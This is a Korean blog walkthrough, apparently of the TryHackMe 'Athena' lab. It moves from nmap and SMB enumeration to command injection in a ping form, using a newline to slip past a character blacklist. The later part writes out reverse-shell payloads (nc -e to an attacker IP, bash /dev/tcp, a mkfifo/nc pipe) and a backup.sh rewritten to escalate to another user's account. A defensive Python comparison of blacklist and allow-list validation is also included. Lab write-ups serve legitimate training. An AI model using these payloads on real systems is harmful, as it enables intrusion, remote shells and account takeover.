호그와트

tryhackme athena fantasia :: walkthrough by tryhackme GOD

영웅*^%&$ 2024. 5. 5. 01:04

Starting Nmap 7.60 ( https://nmap.org ) at 2024-05-04 00:54 BST
Host is up (0.038s latency).
Not shown: 65531 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 02:E7:1F:28:DF:9F (Unknown)

nmap -sV 10.10.244.72 -p 22,80,139,445

Starting Nmap 7.60 ( https://nmap.org ) at 2024-05-04 01:00 BST
Nmap scan report for atena.thm (10.10.244.72)
Host is up (0.00018s latency).

PORT    STATE SERVICE       VERSION
22/tcp  open  ssh           OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http          Apache httpd 2.4.41 ((Ubuntu))
139/tcp open  netbios-ssn?
445/tcp open  microsoft-ds?
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port139-TCP:V=7.60%I=7%D=5/4%Time=66357AB6%P=x86_64-pc-linux-gnu%r(SMBP
SF:rogNeg,29,"\0\0\0%\xffSMBr\0\0\0\0\x88\x03@\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:@\x06\0\0\x01\0\x01\xff\xff\0\0");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port445-TCP:V=7.60%I=7%D=5/4%Time=66357AB1%P=x86_64-pc-linux-gnu%r(SMBP
SF:rogNeg,29,"\0\0\0%\xffSMBr\0\0\0\0\x88\x03@\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:@\x06\0\0\x01\0\x01\xff\xff\0\0");
MAC Address: 02:E7:1F:28:DF:9F (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel



## enum4linux -a 10.10.244.72   (SMB enumeration; ref. "Pentesting SMB")

S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
S-1-22-1-1000 Unix User\ubuntu (Local User)
S-1-22-1-1001 Unix User\athena (Local User)

Two local Unix users show up through RID cycling: ubuntu and athena.

Full enum4linux output from a later session (the target came back on a different IP, 10.10.27.81; same host, athena.thm):

`enum4linux -a 10.10.27.81`

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 10.10.27.81
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 =================================================== 
|    Enumerating Workgroup/Domain on 10.10.27.81    |
 =================================================== 
[+] Got domain/workgroup name: SAMBA

 =========================================== 
|    Nbtstat Information for 10.10.27.81    |
 =========================================== 
Looking up status of 10.10.27.81
ROUTERPANEL     <00> -         B <ACTIVE>  Workstation Service
ROUTERPANEL     <03> -         B <ACTIVE>  Messenger Service
ROUTERPANEL     <20> -         B <ACTIVE>  File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
SAMBA           <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
SAMBA           <1d> -         B <ACTIVE>  Master Browser
SAMBA           <1e> - <GROUP> B <ACTIVE>  Browser Service Elections

MAC Address = 00-00-00-00-00-00

 ==================================== 
|    Session Check on 10.10.27.81    |
 ==================================== 
[+] Server 10.10.27.81 allows sessions using username '', password ''

 ========================================== 
|    Getting domain SID for 10.10.27.81    |
 ========================================== 
Domain Name: SAMBA
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

 ===================================== 
|    OS information on 10.10.27.81    |
 ===================================== 
Use of uninitialized value $os_info in concatenation (.) or string at /root/Desktop/Tools/Miscellaneous/enum4linux.pl line 464.
[+] Got OS info for 10.10.27.81 from smbclient: 
[+] Got OS info for 10.10.27.81 from srvinfo:
ROUTERPANEL    Wk Sv PrQ Unx NT SNT Samba 4.15.13-Ubuntu
platform_id     : 500
os version      : 6.1
server type     : 0x809a03

 ============================ 
|    Users on 10.10.27.81    |
 ============================ 
Use of uninitialized value $users in print at /root/Desktop/Tools/Miscellaneous/enum4linux.pl line 876.
Use of uninitialized value $users in pattern match (m//) at /root/Desktop/Tools/Miscellaneous/enum4linux.pl line 879.

Use of uninitialized value $users in print at /root/Desktop/Tools/Miscellaneous/enum4linux.pl line 892.
Use of uninitialized value $users in pattern match (m//) at /root/Desktop/Tools/Miscellaneous/enum4linux.pl line 894.

 ======================================== 
|    Share Enumeration on 10.10.27.81    |
 ======================================== 
WARNING: The "syslog" option is deprecated

Sharename       Type      Comment
---------       ----      -------
public          Disk      
IPC$            IPC       IPC Service (Samba 4.15.13-Ubuntu)
Reconnecting with SMB1 for workgroup listing.
protocol negotiation failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Failed to connect with SMB1 -- no workgroup available

[+] Attempting to map shares on 10.10.27.81
//10.10.27.81/public Mapping: OK, Listing: OK
//10.10.27.81/IPC$ [E] Can't understand response:
WARNING: The "syslog" option is deprecated
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*

 =================================================== 
|    Password Policy Information for 10.10.27.81    |
 =================================================== 
[E] Dependent program "polenum.py" not present.  Skipping this check.  Download polenum from http://labs.portcullis.co.uk/application/polenum/


 ============================= 
|    Groups on 10.10.27.81    |
 ============================= 

[+] Getting builtin groups:

[+] Getting builtin group memberships:

[+] Getting local groups:

[+] Getting local group memberships:

[+] Getting domain groups:

[+] Getting domain group memberships:

 ====================================================================== 
|    Users on 10.10.27.81 via RID cycling (RIDS: 500-550,1000-1050)    |
 ====================================================================== 
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-1444009243-207373887-3299893081
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\ubuntu (Local User)
S-1-22-1-1001 Unix User\athena (Local User)
[+] Enumerating users using SID S-1-5-21-1444009243-207373887-3299893081 and logon username '', password ''
S-1-5-21-1444009243-207373887-3299893081-500 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-501 ROUTERPANEL\nobody (Local User)
[RIDs 502-512: *unknown*\*unknown* (8), 11 identical lines trimmed]
S-1-5-21-1444009243-207373887-3299893081-513 ROUTERPANEL\None (Domain Group)
[RIDs 514-550 and 1000-1050: *unknown*\*unknown* (8), 88 identical lines trimmed]
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
[RIDs 500-543: *unknown*\*unknown* (8), 44 identical lines trimmed]
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
[RIDs 1000-1050: *unknown*\*unknown* (8), 51 identical lines trimmed]

The share enumeration above already lists the shares; the same list comes straight from a null session:
`smbclient -N -L \\\\10.10.27.81`

The public share maps and lists anonymously, so connect to it and pull what is there:
`smbclient -N \\\\10.10.27.81\\public`

Inside we found a reference to a '/myrouterpanel' directory on the web server, so back to Firefox:

http://athena.thm/myrouterpanel/

The panel is a ping form. A first attempt at command injection with a semicolon, `127.0.0.1';ls`, is rejected ("Attempt hacking!"): the filter blocks `;`, `&` and `|`. It does not block a newline, which the shell treats as a command separator just the same, so this gets through:

ip=127.0.0.1+%0A/usr/bin/id&submit=


ping.php, read off the target with the `cat ping.php` payload (the two commented-out payloads at the top record the requests used: first `id`, then the one that dumped this source):

<?php

// ip=127.0.0.1+%0A/usr/bin/id&submit=
// ip=127.0.0.1+%0Acat%20ping.php&submit=

if (isset($_POST['submit'])) {
    $host = $_POST['ip'];

    // Validate input
    if (containsMaliciousCharacters($host)) {
        echo "Attempt hacking!";
        exit;
    }

    // Execute command safely
    $cmd = "ping -c 4 " . $host;
    $output = shell_exec($cmd);

    if (!$output) {
        echo "Failed to execute ping.";
        exit;
    }

    echo "<pre>" . $output . "</pre>";
}

function containsMaliciousCharacters($input) {
    // Define the set of characters to check for
    $maliciousChars = array(';', '&', '|');

    // Check if any of the malicious characters exist in the input
    foreach ($maliciousChars as $char) {
        if (stripos($input, $char) !== false) {
            return true;
        }
    }

    return false;
}

?>

The "Execute command safely" comment is wrong: `$host` is concatenated straight into `shell_exec()`, and the blacklist only names `;`, `&` and `|`. A newline, `$(...)` or backticks all pass the check and are all interpreted by the shell.
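To make the failure concrete, here is an added Python model of the two checks (example code written for this write-up, not code from the Athena room or its author): ping.php's `containsMaliciousCharacters()` ported as-is, next to an allow-list validator that accepts only a parseable IP address. The payloads are constructed for the example, written as they appear in the POST body and decoded the way PHP fills `$_POST`.

```python
"""Blacklist versus allow-list for the ping form in ping.php.

Added example for this write-up (not code from the Athena room or its author):
the PHP filter is ported to Python so the bypass can be reproduced offline.
The payloads below are constructed for the example, written as they appear in
the POST body and decoded the way PHP fills $_POST.
"""
import ipaddress
from typing import Dict, List, Optional, Tuple
from urllib.parse import unquote_plus

# The exact blacklist from containsMaliciousCharacters() in ping.php.
MALICIOUS_CHARS = (";", "&", "|")


def contains_malicious_characters(value: str) -> bool:
    """Port of the PHP check: reject if any blacklisted character appears."""
    return any(ch in value for ch in MALICIOUS_CHARS)


def blacklist_accepts(decoded_ip: str) -> bool:
    """Original logic: whatever is not blacklisted reaches shell_exec()."""
    return not contains_malicious_characters(decoded_ip)


def allowlist_accepts(decoded_ip: str) -> bool:
    """Hardened logic: the field must be exactly one IPv4 or IPv6 literal.

    Spaces, newlines, $(...), backticks and every other shell metacharacter
    fail to parse as an address, so nothing has to be blacklisted by name.
    PHP equivalent: filter_var($host, FILTER_VALIDATE_IP) !== false.
    """
    try:
        ipaddress.ip_address(decoded_ip)
    except ValueError:
        return False
    return True


def safe_ping_argv(decoded_ip: str) -> Optional[List[str]]:
    """argv for ping with no shell in the path; None if the input is rejected.

    In PHP this is proc_open() with an array command (7.4+), or at minimum
    escapeshellarg($host) instead of concatenating into shell_exec().
    """
    if not allowlist_accepts(decoded_ip):
        return None
    return ["ping", "-c", "4", decoded_ip]


# Constructed payloads, as they would appear after `ip=` in the POST body.
SAMPLE_PAYLOADS = (
    "127.0.0.1",                    # legitimate input
    "127.0.0.1';ls",                # first attempt in the write-up: ';' is blacklisted
    "127.0.0.1+%0A/usr/bin/id",     # the working bypass: newline is not blacklisted
    "127.0.0.1+%0Acat%20ping.php",  # same trick, used to dump the source
    "127.0.0.1+$(id)",              # command substitution also slips through
    "127.0.0.1+%60id%60",           # backticks (`id`) likewise
)


def evaluate_payloads(payloads=SAMPLE_PAYLOADS) -> Dict[str, Tuple[bool, bool]]:
    """Map each raw payload to (blacklist_accepts, allowlist_accepts)."""
    results = {}
    for raw in payloads:
        # '+' becomes a space and %0A a newline, exactly as PHP decodes the form.
        decoded = unquote_plus(raw)
        results[raw] = (blacklist_accepts(decoded), allowlist_accepts(decoded))
    return results


if __name__ == "__main__":
    for raw, (old_ok, new_ok) in evaluate_payloads().items():
        old = "pass " if old_ok else "BLOCK"
        new = "pass " if new_ok else "BLOCK"
        print(f"{raw!r:32} blacklist={old}  allowlist={new}")
```

Run it and the table shows the blacklist stopping only the `;` payload while the allow-list rejects everything that is not a bare address. The matching PHP fix is to validate with `filter_var($host, FILTER_VALIDATE_IP)` before doing anything else, and to hand the value to the process as a separate argument (`proc_open()` with an array, or `escapeshellarg()`) rather than building a command string for `shell_exec()`.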



Captured request walking the filesystem: `cd /etc` and `ls` each sit on their own line (%0A), so neither `;` nor `&` is ever sent:

POST /myrouterpanel/ping.php HTTP/1.1
Host: athena.thm
Content-Length: 39
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://athena.thm
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.97 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://athena.thm/myrouterpanel/
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close

ip=127.0.0.1+%0Acd%20/etc+%0Als&submit=


HTTP/1.1 200 OK
Date: Sat, 04 May 2024 13:51:54 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 2645
Connection: close
Content-Type: text/html; charset=UTF-8

<pre>PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.016 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.034 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.044 ms
64 bytes from 127.0.0.1: icmp_seq=4 ttl=64 time=0.032 ms

--- 127.0.0.1 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3061ms
rtt min/avg/max/mdev = 0.016/0.031/0.044/0.010 ms
ModemManager
NetworkManager
PackageKit
UPower
X11
acpi
adduser.conf
alsa
alternatives
anacrontab
apache2
apg.conf
apm
apparmor
apparmor.d
apport
appstream.conf
apt
avahi
bash.bashrc
bash_completion
bash_completion.d
bindresvport.blacklist
binfmt.d
bluetooth
brltty
brltty.conf
ca-certificates
ca-certificates.conf
ca-certificates.conf.dpkg-old
calendar
chatscripts
console-setup
cracklib
cron.d
cron.daily
cron.hourly
cron.monthly
cron.weekly
crontab
cups
cupshelpers
dbus-1
dconf
debconf.conf
debian_version
default
deluser.conf
depmod.d
dhcp
dictionaries-common
dpkg
e2scrub.conf
emacs
environment
environment.d
ethertypes
fonts
fprintd.conf
fstab
fstab.orig
fuse.conf
fwupd
gai.conf
gamemode.ini
gdb
gdm3
geoclue
ghostscript
glvnd
gnome
groff
group
group-
grub.d
gshadow
gshadow-
gss
gtk-2.0
gtk-3.0
hdparm.conf
host.conf
hostid
hostname
hosts
hosts.allow
hosts.deny
hp
ifplugd
init
init.d
initramfs-tools
inputrc
insserv.conf.d
iproute2
issue
issue.net
kernel
kernel-img.conf
kerneloops.conf
ld.so.cache
ld.so.conf
ld.so.conf.d
ldap
legal
libao.conf
libaudit.conf
libblockdev
libibverbs.d
libnl-3
libpaper.d
locale.alias
locale.gen
localtime
logcheck
login.defs
logrotate.conf
logrotate.d
lsb-release
ltrace.conf
machine-id
magic
magic.mime
mailcap
mailcap.order
manpath.config
mime.types
mke2fs.conf
modprobe.d
modules
modules-load.d
mtab
mtools.conf
mysql
nanorc
netplan
network
networkd-dispatcher
networks
newt
nsswitch.conf
openvpn
opt
os-release
pam.conf
pam.d
papersize
passwd
passwd-
pcmcia
perl
php
pki
pm
pnm2ppa.conf
polkit-1
popularity-contest.conf
ppp
profile
profile.d
protocols
pulse
python3
python3.8
rc.local
rc.local.vmimport
rc0.d
rc1.d
rc2.d
rc3.d
rc4.d
rc5.d
rc6.d
rcS.d
resolv.conf
rmt
rpc
rsyslog.conf
rsyslog.d
rygel.conf
samba
sane.d
security
selinux
sensors.d
sensors3.conf
services
sgml
shadow
shadow-
shells
skel
snmp
speech-dispatcher
ssh
ssl
subgid
subgid-
subuid
subuid-
sudoers
sudoers.d
sysctl.conf
sysctl.d
systemd
terminfo
thermald
timezone
tmpfiles.d
ubuntu-advantage
ucf.conf
udev
udisks2
ufw
update-manager
update-motd.d
update-notifier
usb_modeswitch.conf
usb_modeswitch.d
vim
vmware-tools
vtrgb
vulkan
wgetrc
wpa_supplicant
xattr.conf
xdg
xml
zsh_command_not_found
</pre>



Reverse shell through the same injection. Listener on the attacking box (10.10.90.2): `nc -lvnp 5678`. This relies on the target's nc supporting `-e`, which it does here:

ip=127.0.0.1+%0A/usr/bin/nc+10.10.90.2+5678+-e+/bin/bash&submit=

Once the shell connects, upgrade it to a pty:
python3 -c 'import pty;pty.spawn("/bin/bash")'

/usr/share/backup/backup.sh is writable by the user we landed as (confirm with `ls -l /usr/share/backup/backup.sh`). Its contents, the copy from /home/athena/notes and the ~/backup path, show it is run as athena, so replacing it with a copy that first spawns a reverse shell hands us athena's account the next time it executes. Overwrite it rather than append (`>>` would leave the original script running in front of ours, and a second `#!/bin/bash` line is just a comment), using the full path, with `nc -lvnp 9001` waiting on the attacking box:

cat << 'EOF' > /usr/share/backup/backup.sh
#!/bin/bash

# Reverse shell command
sh -i >& /dev/tcp/10.10.90.2/9001 0>&1

# Backup directory variable
backup_dir_zip=~/backup

# Ensure the backup directory exists
mkdir -p "$backup_dir_zip"

# Copy all files from notes to backup directory
cp -r /home/athena/notes/* "$backup_dir_zip"

# Zip the contents of the backup directory
zip -r "$backup_dir_zip/notes_backup.zip" "$backup_dir_zip"

# Remove all .txt and .sh files from the specific directory
rm /home/athena/backup/*.txt
rm /home/athena/backup/*.sh

echo "Backup completed..."
EOF

The `>& /dev/tcp/...` redirection above is a bash feature and only works if the script is actually interpreted by bash. If whatever runs backup.sh invokes it with sh (dash on Ubuntu), use the nc and named-pipe variant instead, with `nc -lvnp 443` listening:

cat << 'EOF' > /usr/share/backup/backup.sh
#!/bin/bash

# Reverse shell command
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.90.2 443

# Backup directory variable
backup_dir_zip=~/backup

# Ensure the backup directory exists
mkdir -p "$backup_dir_zip"

# Copy all files from notes to backup directory
cp -r /home/athena/notes/* "$backup_dir_zip"

# Zip the contents of the backup directory
zip -r "$backup_dir_zip/notes_backup.zip" "$backup_dir_zip"

# Remove all .txt and .sh files from the specific directory
rm /home/athena/backup/*.txt
rm /home/athena/backup/*.sh

echo "Backup completed..."
EOF
